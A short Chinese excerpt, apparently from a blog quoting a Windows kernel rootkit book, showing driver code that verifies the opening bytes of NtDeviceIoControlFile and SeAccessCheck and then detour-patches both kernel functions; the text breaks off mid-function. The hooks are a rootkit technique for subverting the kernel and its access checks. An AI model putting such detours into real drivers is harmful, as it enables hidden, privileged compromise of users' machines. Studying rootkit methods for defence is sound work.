本文和代码来自rootkit——windows内核的安全防护
下面展示一个rootkit示例,可以解释对内核函数的detour补丁
1 #include "ntddk.h" 2 3 NTSYSAPI 4 NTSTATUS 5 NTAPI 6 NtDeviceIoControlFile( 7 IN HANDLE hFile, 8 IN HANDLE hEvent OPTIONAL, 9 IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, 10 IN PVOID IoApcContext OPTIONAL, 11 OUT PIO_STATUS_BLOCK pIoStatusBlock, 12 IN ULONG DeviceIoControlCode, 13 IN PVOID InBuffer OPTIONAL, 14 IN ULONG InBufferLength, 15 OUT PVOID OutBuffer OPTIONAL, 16 IN ULONG OutBufferLength 17 ); 18 19 NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) 20 { 21 DbgPrint("My Driver Loaded!"); 22 23 // TODO!! theDriverObject->DriverUnload = OnUnload; 24 25 if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile()) 26 { 27 DbgPrint("Match Failure on NtDeviceIoControlFile!"); 28 return STATUS_UNSUCCESSFUL; 29 } 30 31 if(STATUS_SUCCESS != CheckFunctionBytesSeAccessCheck()) 32 { 33 DbgPrint("Match Failure on SeAccessCheck!"); 34 return STATUS_UNSUCCESSFUL; 35 } 36 37 DetourFunctionNtDeviceIoControlFile(); 38 DetourFunctionSeAccessCheck(); 39 40 return STATUS_SUCCESS; 41 }
检查NtDeviceIoControlFile是否已经被detour了
1 NTSTATUS CheckFunctionBytesNtDeviceIoControlFile() 2 { 3 int i=0; 4 char *p = (char *)NtDeviceIoControlFile; 5 6 //The beginning of the NtDeviceIoControlFile function 7 //should match: 8 //55 PUSH EBP 9 //8BEC MOV EBP, ESP 10 //6A01 PUSH 01 11 //FF752C PUSH DWORD PTR [EBP + 2C] 12 13 char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C }; 14 15 while(i<8) 16 { 17 DbgPrint(" - 0x%02X "